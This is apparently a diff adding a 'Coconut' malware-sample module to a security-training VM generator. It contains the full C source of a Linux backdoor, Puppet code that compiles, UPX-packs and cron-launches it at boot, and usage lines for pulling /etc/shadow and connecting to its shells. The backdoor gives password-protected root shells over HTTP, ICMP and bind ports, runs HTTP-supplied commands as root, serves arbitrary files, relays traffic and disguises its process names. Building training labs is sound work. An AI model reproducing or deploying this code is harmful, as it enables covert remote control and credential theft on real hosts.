*
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)
* Thx bkbll's Transmit code, and thx Neil,con,iceblood for test.
*
************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <pthread.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#define HTTPD_PORT 9009
#define BIND_PORT 8899
#define ICMP_PORT 8090
#define TRAN_PORT 1080
#define SIZEPACK 101
#define MAXSIZE 32768
#define TIMEOUT 120
#define CONNECT_NUMBER 1
#define HIDEME "[login] "
#define HIDEICMP "[su] "
#define HIDEFILE "[bash] "
#define GET_FILE "givemefile"
#define SHELL_NAME "givemeshell"
#define BIND_NAME "bindport"
#define TRAN_NAME "socks"
#define DISPART ":"
#define DISPART1 "::"
#define DISPART2 ":::"
#define $GNUPLIB "allesgute:)"
#define _$PRINT "\r\n========= Welcome to Year 2068 =========\r\n========== :) =========\r\n\r\nYour command: \0"
#define GIVEPASS "\r\nEnter Your password: \0"
#define max(a, b) (a)>(b)?(a) : (b)
int maxfd, infd, outfd;
unsigned char ret_buf[32768];
int daemon_init();
void sig_chid();
int TCP_listen();
char* read_file();
ssize_t writen_file();
int bind_shell();
int get_shell();
int icmp_shell();
int socks();
int create_socket();
int create_serv();
int client_connect();
int quit();
void out2in();
char x2c();
void unescape_url();
void plustospace();
int main(int argc, char *argv[])
{
int fd, len, i, icmp;
int csocket;
struct sockaddr_in caddr;
char readstr[4000];
char *cbuf;
pid_t pid;
signal(SIGCHLD, sig_chid);
daemon_init();
if((pid = fork()) == -1) exit(0);
if(pid <= 0)
{
strcpy(argv[0], HIDEICMP);
icmp_shell();
}
fd = TCP_listen(HTTPD_PORT);
if(fd <= 0) return -1;
for(;;)
{
strcpy(argv[0], HIDEME);
len = sizeof(caddr);
if((csocket = accept(fd, &caddr, &len)) < 0) continue;
if((pid = fork()) == -1) continue;
if(pid <= 0)
{
strcpy (argv[0], HIDEFILE);
i = recv(csocket, readstr, 4000,0);
if (i == -1) break;
if( readstr[ i -1 ] != '\n' ) break;
readstr [i] = '\0';
cbuf = read_file(readstr, csocket);
close(csocket);
}
close(csocket);
}
close(fd);
return(1);
}
int daemon_init()
{
struct sigaction act;
int i, maxfd;
if(fork() != 0) exit(0);
if(setsid() < 0) return(-1);
act.sa_handler = SIG_IGN;
act.sa_flags = 0;
sigaction(SIGHUP, &act, 0);
if(fork() != 0) exit(0);
chdir("/tmp");
umask(0);
maxfd = sysconf(_SC_OPEN_MAX);
for(i=0; i<maxfd; i++)
close(i);
open("/dev/null", O_RDWR);
dup(0);
dup(1);
dup(2);
return(0);
}
void sig_chid(int signo)
{
pid_t pid;
int stat;
while((pid = waitpid(-1, &stat, WNOHANG))>0);
printf("children %d died\n", pid);
return;
}
int TCP_listen(int port)
{
struct sockaddr_in laddr ;
int fd;
socklen_t len ;
fd = socket(AF_INET, SOCK_STREAM, 0);
len = sizeof(laddr) ;
memset(&laddr, 0, len) ;
laddr.sin_addr.s_addr = htonl(INADDR_ANY) ;
laddr.sin_family = AF_INET ;
laddr.sin_port = htons(port) ;
if((bind(fd, (const struct sockaddr *)&laddr, len))) return(-1);
if(listen(fd, 5)) return(-1);
return(fd);
}
char * read_file(char *buf, int fd)
{
char *erro=
"Content-type: text/html\n\n"
"HTTP/1.1 404 Not Found\n"
"Date: 1 Jan 2060 03:19:55 GMT\n"
"Server: Apache/99.98.97 (RoboUnix)\n"
"Connection: close\n"
"Content-Type: text/html\n\n"
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 4.0//EN\">\n"
"<HTML><HEAD>\n"
"<TITLE>404 Not Found</TITLE>\n"
"</HEAD><BODY>\n"
"<H1>Not Found</H1>\n"
"The requested URL was not found on this server.<P>\n"
"<HR>\n"
"<ADDRESS>Apache/99.98.97 Server at localhost Port 9009</ADDRESS>\n"
"</BODY></HTML>\n\n";
char *bindok=
"Content-type: text/html\n\n"
"<html>\n<head><title>Bind Shell ok.:)</title></head>\n"
"<body bgcolor=\"#000000\">\n"
"<div align=\"center\"><p>\n"
"<font face=\"Arial\" color=\"#999999\" size=\"7\"><b>\n"
"You get it, goodluck! :-)\n"
"</b></font></p></div><br>\n"
"</body></html>\n\n";
char *tranok=
"Content-type: text/html\n\n"
"<html>\n<head><title>Tran ok.:)</title></head>\n"
"<body bgcolor=\"#000000\">\n"
"<div align=\"center\"><p>\n"
"<font face=\"Arial\" color=\"#999999\" size=\"7\"><b>\n"
"Tran ok!\n"
"</b></font></p></div><br>\n"
"</body></html>\n\n";
char *httpok1=
"Content-type: text/html\n\n"
"<html>\n<head><title>Shell ok.:)</title></head>\n"
"<body bgcolor=\"#000000\">\n"
"<div align=\"left\">\n"
"<pre><font face=\"Arial\" color=\"#999999\" size=\"2\">\n";
char *httpok2=
"</font></pre></div><br>\n"
"</body></html>\n\n";
char *yourcom=
"<b>Your Command:</b>\n";
char *br=
"<br>\n";
int listenp, targetp, i, j, c, bport;
char *cmd, *par, *op, *hp, *tp, *targeth, *command;
char *swap_file = "/tmp/tmp.txt";
char *setpath = "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:.";
FILE *f;
cmd = buf;
par = strstr(cmd, $GNUPLIB);
if(par != NULL)
{
get_shell(fd);
exit(0);
}
par = strstr(cmd, BIND_NAME);
op = strstr(cmd, DISPART);
if(par != NULL && op != NULL)
{
bport = atoi(op + strlen(DISPART));
if(bport <= 0)
bport = BIND_PORT;
write(fd, bindok, strlen(bindok));
close(fd);
bind_shell(bport);
exit(0);
}
par = strstr(cmd, TRAN_NAME);
op = strstr(cmd, DISPART);
hp = strstr(cmd, DISPART1);
tp = strstr(cmd, DISPART2);
if(par != NULL && op != NULL && hp != NULL && tp != NULL)
{
listenp = atoi(op + strlen(DISPART));
if(listenp <= 0)
listenp = TRAN_PORT;
targetp = atoi(tp + strlen(DISPART2));
if(targetp <= 0)
targetp = 23;
hp = (hp + strlen(DISPART1));
targeth = strncpy(ret_buf, hp,strlen(hp) - strlen(tp));
targeth[strlen(hp) - strlen(tp)] = '\0';
write(fd, tranok, strlen(tranok));
close(fd);
socks(listenp, targeth, targetp);
exit(0);
}
par = strstr(cmd, SHELL_NAME);
op = strstr(cmd, DISPART);
if(par != NULL && op != NULL)
{
tp = buf + 5 + strlen(SHELL_NAME) + strlen(DISPART);
hp = strstr(tp, "HTTP");
if(hp != NULL) *hp = '\0';
tp[strlen(tp) - 1] = 0;
plustospace(tp);
unescape_url(tp);
c = j = strlen(tp);
tp[j] = ' ';j++;
tp[j] = ' ';j++;
tp[j] = '>';j++;
tp[j] = ' ';j++;
for(i = 0; i <= strlen(swap_file); i++, j++)
{
tp[j] = swap_file[i];
}
tp[j + strlen(swap_file)] = '\0';
command = tp;
setuid(0);
setgid(0);
chdir("/tmp");
putenv(setpath);
system(command);
f = fopen(swap_file, "r");
if (f == NULL)
{
writen_file(fd, erro, strlen(erro));
return erro;
}
writen_file(fd, httpok1, strlen(httpok1));
writen_file(fd, yourcom, strlen(yourcom));
writen_file(fd, command, c);
writen_file(fd, br, strlen(br));
writen_file(fd, br, strlen(br));
while( !feof(f) )
{
i = fread(ret_buf, 1, 32768, f);
if (i == 0) break;
writen_file(fd, ret_buf, i);
}
fclose(f);
writen_file(fd, br, strlen(br));
writen_file(fd, httpok2, strlen(httpok2));
remove(swap_file);
exit(0);
}
par = NULL;
par = strstr(cmd, GET_FILE);
if(par != NULL)
{
op = buf + 5 + strlen(GET_FILE);
tp = strstr(op, "HTTP");
if(tp != NULL) *tp = '\0';
op[strlen(op) - 1] = 0;
f = fopen(op, "r");
if (f == NULL)
{
writen_file(fd, erro, strlen(erro));
return erro;
}
while( !feof(f) )
{
i = fread(ret_buf, 1, 32768, f);
if (i == 0) break;
writen_file(fd, ret_buf, i);
}
fclose(f);
exit(0);
}
writen_file(fd, erro, strlen(erro));
close(fd);
exit(-1);
}
ssize_t writen_file(int fd, const void *vptr, size_t n)
{
size_t nleft;
ssize_t nwritten;
const char *ptr;
ptr = vptr;
nleft = n;
while(nleft > 0)
{
if((nwritten = write(fd, ptr, nleft)) <= 0)
{
if(errno == EINTR)
nwritten = 0;
else
return(-1);
}
nleft -= nwritten;
ptr += nwritten;
}
return(n);
}
int bind_shell(int port)
{
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid, i, time;
char passwd[15];
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
struct timeval testtime;
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
chdir("/tmp");
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(port);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
testtime.tv_sec = TIMEOUT;
testtime.tv_usec = 0;
alarm(TIMEOUT);
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
alarm(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0)
{
write(soc_cli, GIVEPASS, strlen(GIVEPASS));
recv(soc_cli, passwd, sizeof(passwd), 0);
for (i = 0; i < strlen(passwd); i++)
{
if (passwd[i] == '\n' || passwd[i] == '\r')
{
passwd[i] = '\0';
}
}
if (strcmp(passwd, $GNUPLIB) != 0)
{
close(soc_cli);
close(soc_rc);
exit(-1);
}
write(soc_cli, _$PRINT, strlen(_$PRINT));
for (i = 0; i < 3; i++)
{
dup2(soc_cli, i);
}
execl("/bin/sh","sh",(char *)0);
close(soc_cli);
close(soc_rc);
exit(1);
}
close(soc_cli);
close(soc_rc);
exit(0);
}
int get_shell(int fd)
{
int i;
setuid(0);
setgid(0);
chdir("/tmp");
write(fd, _$PRINT, strlen(_$PRINT));
for (i = 0; i < 3; i++)
{
dup2(fd, i);
}
execl("/bin/sh","sh",(char *)0);
close(fd);
return 1;
}
int icmp_shell()
{
int i, s, size, fromlen, port = ICMP_PORT;
char pkt[4096];
struct protoent *proto;
struct sockaddr_in from;
proto = getprotobyname("icmp");
if((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0)
exit(0);
while(1)
{
do
{
fromlen = sizeof(from);
if((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr *)&from, &fromlen)) < 0)
printf("", size - 28);
}while(size != SIZEPACK + 28);
switch(fork())
{
case -1:
continue;
case 0:
bind_shell(port);
exit (0);
}
}
return 1;
}
int socks(int listenp, char *targeth, int targetp)
{
int listfd, outside, inside, size;
pthread_t thread1;
struct sockaddr_in client;
if(!(listfd = create_socket())) exit(1);
if(!(create_serv(listfd, listenp))) exit(1);
for(;;)
{
size = sizeof(struct sockaddr);
if((outfd = accept(listfd, (struct sockaddr *)&client, &size)) < 0)
{
continue;
}
if(!(infd=create_socket())) exit(1);
if(!(client_connect(infd, targeth, targetp))) quit(outfd, infd, listfd);
maxfd = max(outfd, infd) + 1;
pthread_create(&thread1, NULL, (void *)&out2in, NULL);
}
close(listfd);
}
int create_socket()
{
int sockfd;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0))<0)
{
return(0);
}
return(sockfd);
}
int create_serv(int sockfd, int port)
{
struct sockaddr_in srvaddr;
bzero(&srvaddr, sizeof(struct sockaddr));
srvaddr.sin_port = htons(port);
srvaddr.sin_family = AF_INET;
srvaddr.sin_addr.s_addr = htonl(INADDR_ANY);
if(bind(sockfd, (struct sockaddr *)&srvaddr, sizeof(struct sockaddr))<0)
{
return(0);
}
if(listen(sockfd,CONNECT_NUMBER)<0)
{
return(0);
}
return(1);
}
int client_connect(int sockfd, char *server, int port)
{
struct sockaddr_in cliaddr;
struct hostent *host;
if(!(host = gethostbyname(server)))
{
return(0);
}
bzero(&cliaddr, sizeof(struct sockaddr));
cliaddr.sin_family = AF_INET;
cliaddr.sin_port = htons(port);
cliaddr.sin_addr = *((struct in_addr *)host->h_addr);
if(connect(sockfd, (struct sockaddr *)&cliaddr, sizeof(struct sockaddr)) < 0)
{
return(0);
}
return(1);
}
int quit(int a, int b, int c)
{
close(a);
close(b);
close(c);
exit(1);
}
void out2in()
{
struct timeval timeset;
fd_set readfd, writefd;
int result, i = 0;
char read_in1[MAXSIZE], send_out1[MAXSIZE];
char read_in2[MAXSIZE], send_out2[MAXSIZE];
int read1 = 0, totalread1 = 0, send1=0;
int read2 = 0, totalread2 = 0, send2=0;
int out_fd, in_fd;
out_fd = outfd;
in_fd = infd;
bzero(read_in1, MAXSIZE);
bzero(read_in2, MAXSIZE);
bzero(send_out1, MAXSIZE);
bzero(send_out2, MAXSIZE);
timeset.tv_sec = TIMEOUT;
timeset.tv_usec = 0;
while(1)
{
FD_ZERO(&readfd);
FD_ZERO(&writefd);
FD_SET(out_fd, &readfd);
FD_SET(in_fd, &writefd);
FD_SET(out_fd, &writefd);
FD_SET(in_fd, &readfd);
result = select(maxfd, &readfd, &writefd, NULL, NULL);
if(result < 0)
{
return;
}
else
if(result == 0)
{
return;
}
if(FD_ISSET(out_fd, &readfd))
{
read1 = recv(out_fd, read_in1, MAXSIZE, 0);
if(read1 == 0) break;
if(read1 < 0)
{
return;
}
memcpy(send_out1 + totalread1, read_in1, read1);
totalread1 += read1;
bzero(read_in1, MAXSIZE);
}
if(FD_ISSET(in_fd, &writefd))
{
while(totalread1 > 0)
{
send1 = write(in_fd, send_out1, totalread1);
if(send1 == 0)break;
if(send1 < 0)
{
continue;
}
totalread1 -= send1;
}
bzero(send_out1, MAXSIZE);
}
if(FD_ISSET(in_fd, &readfd))
{
read2 = recv(in_fd, read_in2, MAXSIZE, 0);
if(read2 == 0) break;
if(read2 < 0)
{
return;
}
memcpy(send_out2 + totalread2, read_in2, read2);
totalread2 += read2;
bzero(read_in2, MAXSIZE);
}
if(FD_ISSET(out_fd, &writefd))
{
while(totalread2 > 0)
{
send2 = write(out_fd, send_out2, totalread2);
if(send2 == 0) break;
if(send2 < 0)
{
continue;
}
totalread2 -= send2;
}
bzero(send_out2, MAXSIZE);
}
}
close(out_fd);
close(in_fd);
return;
}
char x2c(char *what)
{
register char digit;
digit = (what[0] >= 'A' ? ((what[0] & 0xdf) - 'A')+10 : (what[0] - '0'));
digit *= 16;
digit += (what[1] >= 'A' ? ((what[1] & 0xdf) - 'A')+10 : (what[1] - '0'));
return (digit);
}
void unescape_url(char *url)
{
register int x, y;
for(x = 0 , y = 0; url[y]; ++x, ++y)
{
if((url[x] = url[y]) == '%')
{
url[x] = x2c(&url[y + 1]);
y += 2;
}
}
url[x] = '\0';
}
void plustospace(char *str)
{
register int x;
for(x = 0; str[x]; x++)
if (str[x] == '+')
str[x] = ' ';
}

78
modules/utilities/unix/malware/coconut/manifests/install.pp Normal file
View File

@@ -0,0 +1,78 @@
class coconut::install {
$secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
$coconut_config = parsejson($secgen_parameters['coconut_config'][0])
$account = parsejson($secgen_parameters['account'][0])
$username = $account['username']
$include_source = str2bool($coconut_config['include_source'])
$pack_binary = str2bool($coconut_config['pack_binary'])
$welcome_msg_code = $coconut_config['welcome_msg_code']
$bd_timeout = $coconut_config['bd_timeout']
$http_bd_port = $coconut_config['http_bd_port']
$icmp_bd_port = $coconut_config['icmp_bd_port']
$bind_bd_port = $coconut_config['bind_bd_port']
$transport_port = $coconut_config['transport_port']
$bd_password = $coconut_config['bd_password']
# Generate the C file (either in the home directory or the supplied storage_directory)
$install_dir = "/home/$username/malware"
$c_file_path = "$install_dir/coconut.c"
# Create install dir
::secgen_functions::create_directory { "create_$install_dir":
path => $install_dir,
notify => File["create $install_dir/coconut.c"],
}
# Create C file
file { "create $install_dir/coconut.c":
path => $c_file_path,
# source => 'puppet:///modules/coconut/coconut.c',
content => template('coconut/coconut.c.erb'),
mode => '0777',
}
# Compile binary
exec { "gcc $install_dir/coconut.c":
cwd => $install_dir,
command => "/usr/bin/gcc -o coconut_unpacked coconut.c -lpthread",
require => File["create $install_dir/coconut.c"],
}
if $pack_binary {
# Pack with upx
notice("Packing Coconut binary with UPX")
ensure_packages('upx-ucl')
exec { "upx $install_dir/coconut":
cwd => $install_dir,
command => "/usr/bin/upx -o coconut coconut_unpacked",
require => Exec["gcc $install_dir/coconut.c"]
}
unless $include_source {
notice("Removing coconut.c source code file")
exec { "Removing coconut.c file":
cwd => $install_dir,
command => "/bin/rm $install_dir/coconut.c",
require => Exec["upx $install_dir/coconut"],
}
}
exec { "rm unpacked binary":
cwd => $install_dir,
command => "/bin/rm $install_dir/coconut_unpacked",
require => Exec["upx $install_dir/coconut"]
}
} else {
notice("No packer used, renaming Coconut binary")
exec { "rename unpacked binary":
cwd => $install_dir,
command => "/bin/mv $install_dir/coconut_unpacked $install_dir/coconut",
}
unless $include_source {
notice("Removing coconut.c source code file")
exec { "Removing coconut.c file":
cwd => $install_dir,
command => "/bin/rm $install_dir/coconut.c",
require => Exec["rename unpacked binary"]
}
}
}
}

19
modules/utilities/unix/malware/coconut/manifests/service.pp Normal file
View File

@@ -0,0 +1,19 @@
class coconut::service {
# If we've got a port supplied, host the binary over the network. Otherwise do nothing
$secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
$account = parsejson($secgen_parameters['account'][0])
$username = $account['username']
$run_sample = str2bool($secgen_parameters['run_sample'][0])
if $run_sample {
notice("COCONUT run_sample $run_sample: Running sample on reboot via cron... ")
# run on each boot via cron
cron { "cron run on reboot /home/${username}/malware/coconut":
command => "sleep 60; /home/${$username}/malware/coconut",
special => 'reboot',
}
} else {
notice("COCONUT run_sample $run_sample: Not running sample... ")
}
}

50
modules/utilities/unix/malware/coconut/secgen_metadata.xml Normal file
View File

@@ -0,0 +1,50 @@
<?xml version="1.0"?>
<utility xmlns="http://www.github/cliffe/SecGen/utility"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/utility">
<name>Coconut</name>
<author>Thomas Shaw</author>
<author>Mo Hassan</author>
<module_license>MIT</module_license>
<description>Coconut malware sample (based on allinone.c). Compiles binary and drops C file on the box.</description>
<type>malware_sample</type>
<platform>linux</platform>
<reference>https://packetstormsecurity.com/files/29898/allinone.c.html</reference>
<read_fact>account</read_fact>
<read_fact>run_sample</read_fact>
<read_fact>coconut_config</read_fact>
<default_input into="run_sample">
<value>false</value>
</default_input>
<default_input into="account">
<generator type="account">
<input into="username">
<value>challenger</value>
</input>
<input into="password">
<value>tiaspbiqe2r</value>
</input>
</generator>
</default_input>
<default_input into="coconut_config">
<generator type="coconut_config"/>
</default_input>
<requires>
<type>update</type>
</requires>
<requires>
<module_path>utilities/unix/system/parameterised_accounts</module_path>
</requires>
<requires>
<module_path>.*/reversing_tools</module_path>
</requires>
</utility>

805
modules/utilities/unix/malware/coconut/templates/coconut.c.erb Normal file
View File

@@ -0,0 +1,805 @@
/************************************************************************
* coconut.c is based on allinone.c
*
* a Http server,
* a sockets transmit server,
* a shell backdoor,
* a icmp backdoor,
* a bind shell backdoor,
* a like http shell,
* it can translate file from remote host,
* it can give you a socks5 proxy,
* it can use for to attack, jumps the extension, Visits other machines.
* it can give you a root shell.:)
*
* Usage:
* compile:
* gcc -o allinone allinone.c -lpthread
* run on target:
* ./coconut
*
* 1.httpd server
* Client:
* http://target:9009/givemefile/etc/passwd
* lynx -dump http://target:9009/givemefile/etc/shadow > shadow
* or wget http://target:9009/givemefile/etc/shadow
*
* 2.icmp backdoor
* Client:
* ping -l 101 target (on windows)
* ping -s 101 -c 4 target (on linux)
* nc target 8090
* allesgute:) --> your password
*
* 3.shell backdoor
* Client:
* nc target 9009
* allesgute:) --> your password
*
* 4.bind a root shell on your port
* Client:
* http://target:9009/bindport:8899
* nc target 8899
* allesgute:) --> your password
*
* 5.sockets transmit
* Client:
* http://target:9009/socks/:local listen port::you want to tran ip:::you want to tran port
* http://target:9009/socks/:1080::192.168.0.1:::21
* nc target 1080
*
* 6.http shell
* Client:
* http://target:9009/givemeshell:ls -al (no pipe)
*
* ps:
* All bind shell have a passwd, default is: allesgute:)
* All bind shell will close, if Two minutes do not have the connection.
* All bind shell only can use one time until reactivates.
*
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)
* Thx bkbll's Transmit code, and thx Neil,con,iceblood for test.
*
************************************************************************/
<%="#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <pthread.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>"-%>
#define HTTPD_PORT <%= @http_bd_port %>
#define BIND_PORT <%= @bind_bd_port %>
#define ICMP_PORT <%= @icmp_bd_port %>
#define TRAN_PORT <%= @transport_port %>
#define SIZEPACK 101
#define MAXSIZE 32768
#define TIMEOUT <%= @bd_timeout %>
#define CONNECT_NUMBER 1
#define HIDEME "[login] "
#define HIDEICMP "[su] "
#define HIDEFILE "[bash] "
#define GET_FILE "givemefile"
#define SHELL_NAME "givemeshell"
#define BIND_NAME "bindport"
#define TRAN_NAME "socks"
#define DISPART ":"
#define DISPART1 "::"
#define DISPART2 ":::"
#define $GNUPLIB "<%= @bd_password -%>"
#define _$PRINT "\r\n======== Welcome to Year 2068 ========\r\n========== :)=========\r\n========== Code: <%= @welcome_msg_code -%> ==========\r\n\r\nYour command: \0"
#define GIVEPASS "\r\nEnter Your password: \0"
#define max(a, b) (a)>(b)?(a) : (b)
int maxfd, infd, outfd;
unsigned char ret_buf[32768];
int daemon_init();
void sig_chid();
int TCP_listen();
char* read_file();
ssize_t writen_file();
int bind_shell();
int get_shell();
int icmp_shell();
int socks();
int create_socket();
int create_serv();
int client_connect();
int quit();
void out2in();
char x2c();
void unescape_url();
void plustospace();
int main(int argc, char *argv[])
{
int fd, len, i, icmp;
int csocket;
struct sockaddr_in caddr;
char readstr[4000];
char *cbuf;
pid_t pid;
signal(SIGCHLD, sig_chid);
daemon_init();
if((pid = fork()) == -1) exit(0);
if(pid <= 0)
{
strcpy(argv[0], HIDEICMP);
icmp_shell();
}
fd = TCP_listen(HTTPD_PORT);
if(fd <= 0) return -1;
for(;;)
{
strcpy(argv[0], HIDEME);
len = sizeof(caddr);
if((csocket = accept(fd, &caddr, &len)) < 0) continue;
if((pid = fork()) == -1) continue;
if(pid <= 0)
{
strcpy (argv[0], HIDEFILE);
i = recv(csocket, readstr, 4000,0);
if (i == -1) break;
if( readstr[ i -1 ] != '\n' ) break;
readstr [i] = '\0';
cbuf = read_file(readstr, csocket);
close(csocket);
}
close(csocket);
}
close(fd);
return(1);
}
int daemon_init()
{
struct sigaction act;
int i, maxfd;
if(fork() != 0) exit(0);
if(setsid() < 0) return(-1);
act.sa_handler = SIG_IGN;
act.sa_flags = 0;
sigaction(SIGHUP, &act, 0);
if(fork() != 0) exit(0);
chdir("/tmp");
umask(0);
maxfd = sysconf(_SC_OPEN_MAX);
for(i=0; <%="i<maxfd"-%>; i++)
close(i);
open("/dev/null", O_RDWR);
dup(0);
dup(1);
dup(2);
return(0);
}
void sig_chid(int signo)
{
pid_t pid;
int stat;
while((pid = waitpid(-1, &stat, WNOHANG))>0);
printf("children %d died\n", pid);
return;
}
int TCP_listen(int port)
{
struct sockaddr_in laddr ;
int fd;
socklen_t len ;
fd = socket(AF_INET, SOCK_STREAM, 0);
len = sizeof(laddr) ;
memset(&laddr, 0, len) ;
laddr.sin_addr.s_addr = htonl(INADDR_ANY) ;
laddr.sin_family = AF_INET ;
laddr.sin_port = htons(port) ;
if((bind(fd, (const struct sockaddr *)&laddr, len))) return(-1);
if(listen(fd, 5)) return(-1);
return(fd);
}
char * read_file(char *buf, int fd)
{
char *erro=
"Content-type: text/html\n\n"
"HTTP/1.1 404 Not Found\n"
"Date: 1 Jan 2060 03:19:55 GMT\n"
"Server: Apache/99.98.97 (RoboUnix)\n"
"Connection: close\n"
"Content-Type: text/html\n\n"
<%='"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 4.0//EN\">\n"
"<HTML><HEAD>\n"
"<TITLE>404 Not Found</TITLE>\n"
"</HEAD><BODY>\n"
"<H1>Not Found</H1>\n"
"The requested URL was not found on this server.<P>\n"
"<HR>\n"
"<ADDRESS>Apache/99.98.97 Server at localhost Port 9009</ADDRESS>\n"
"</BODY></HTML>\n\n"; '%>
char *bindok=
"Content-type: text/html\n\n"
<%='"<html>\n<head><title>Bind Shell ok.:)</title></head>\n"
"<body bgcolor=\"#000000\">\n"
"<div align=\"center\"><p>\n"
"<font face=\"Arial\" color=\"#999999\" size=\"7\"><b>\n"
"You get it, goodluck! :-)\n"
"</b></font></p></div><br>\n"
"</body></html>\n\n";'%>
char *tranok=
<%='"Content-type: text/html\n\n"
"<html>\n<head><title>Tran ok.:)</title></head>\n"
"<body bgcolor=\"#000000\">\n"
"<div align=\"center\"><p>\n"
"<font face=\"Arial\" color=\"#999999\" size=\"7\"><b>\n"
"Tran ok!\n"
"</b></font></p></div><br>\n"
"</body></html>\n\n";'%>
char *httpok1=
<%='"Content-type: text/html\n\n"
"<html>\n<head><title>Shell ok.:)</title></head>\n"
"<body bgcolor=\"#000000\">\n"
"<div align=\"left\">\n"
"<pre><font face=\"Arial\" color=\"#999999\" size=\"2\">\n";'%>
char *httpok2=
<%='"</font></pre></div><br>\n"
"</body></html>\n\n";'%>
char *yourcom=
<%='"<b>Your Command:</b>\n";'%>
char *br=
<%='"<br>\n";'%>
int listenp, targetp, i, j, c, bport;
char *cmd, *par, *op, *hp, *tp, *targeth, *command;
char *swap_file = "/tmp/tmp.txt";
char *setpath = "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:.";
FILE *f;
cmd = buf;
par = strstr(cmd, $GNUPLIB);
if(par != NULL)
{
get_shell(fd);
exit(0);
}
par = strstr(cmd, BIND_NAME);
op = strstr(cmd, DISPART);
if(par != NULL && op != NULL)
{
bport = atoi(op + strlen(DISPART));
if(bport <= 0)
bport = BIND_PORT;
write(fd, bindok, strlen(bindok));
close(fd);
bind_shell(bport);
exit(0);
}
par = strstr(cmd, TRAN_NAME);
op = strstr(cmd, DISPART);
hp = strstr(cmd, DISPART1);
tp = strstr(cmd, DISPART2);
if(par != NULL && op != NULL && hp != NULL && tp != NULL)
{
listenp = atoi(op + strlen(DISPART));
if(listenp <= 0)
listenp = TRAN_PORT;
targetp = atoi(tp + strlen(DISPART2));
if(targetp <= 0)
targetp = 23;
hp = (hp + strlen(DISPART1));
targeth = strncpy(ret_buf, hp,strlen(hp) - strlen(tp));
targeth[strlen(hp) - strlen(tp)] = '\0';
write(fd, tranok, strlen(tranok));
close(fd);
socks(listenp, targeth, targetp);
exit(0);
}
par = strstr(cmd, SHELL_NAME);
op = strstr(cmd, DISPART);
if(par != NULL && op != NULL)
{
tp = buf + 5 + strlen(SHELL_NAME) + strlen(DISPART);
hp = strstr(tp, "HTTP");
if(hp != NULL) *hp = '\0';
tp[strlen(tp) - 1] = 0;
plustospace(tp);
unescape_url(tp);
c = j = strlen(tp);
tp[j] = ' ';j++;
tp[j] = ' ';j++;
tp[j] = '>';j++;
tp[j] = ' ';j++;
for(i = 0; i <= strlen(swap_file); i++, j++)
{
tp[j] = swap_file[i];
}
tp[j + strlen(swap_file)] = '\0';
command = tp;
setuid(0);
setgid(0);
chdir("/tmp");
putenv(setpath);
system(command);
f = fopen(swap_file, "r");
if (f == NULL)
{
writen_file(fd, erro, strlen(erro));
return erro;
}
writen_file(fd, httpok1, strlen(httpok1));
writen_file(fd, yourcom, strlen(yourcom));
writen_file(fd, command, c);
writen_file(fd, br, strlen(br));
writen_file(fd, br, strlen(br));
while( !feof(f) )
{
i = fread(ret_buf, 1, 32768, f);
if (i == 0) break;
writen_file(fd, ret_buf, i);
}
fclose(f);
writen_file(fd, br, strlen(br));
writen_file(fd, httpok2, strlen(httpok2));
remove(swap_file);
exit(0);
}
par = NULL;
par = strstr(cmd, GET_FILE);
if(par != NULL)
{
op = buf + 5 + strlen(GET_FILE);
tp = strstr(op, "HTTP");
if(tp != NULL) *tp = '\0';
op[strlen(op) - 1] = 0;
f = fopen(op, "r");
if (f == NULL)
{
writen_file(fd, erro, strlen(erro));
return erro;
}
while( !feof(f) )
{
i = fread(ret_buf, 1, 32768, f);
if (i == 0) break;
writen_file(fd, ret_buf, i);
}
fclose(f);
exit(0);
}
writen_file(fd, erro, strlen(erro));
close(fd);
exit(-1);
}
ssize_t writen_file(int fd, const void *vptr, size_t n)
{
size_t nleft;
ssize_t nwritten;
const char *ptr;
ptr = vptr;
nleft = n;
while(nleft > 0)
{
if((nwritten = write(fd, ptr, nleft)) <= 0)
{
if(errno == EINTR)
nwritten = 0;
else
return(-1);
}
nleft -= nwritten;
ptr += nwritten;
}
return(n);
}
int bind_shell(int port)
{
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid, i, time;
char passwd[15];
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
struct timeval testtime;
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
chdir("/tmp");
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
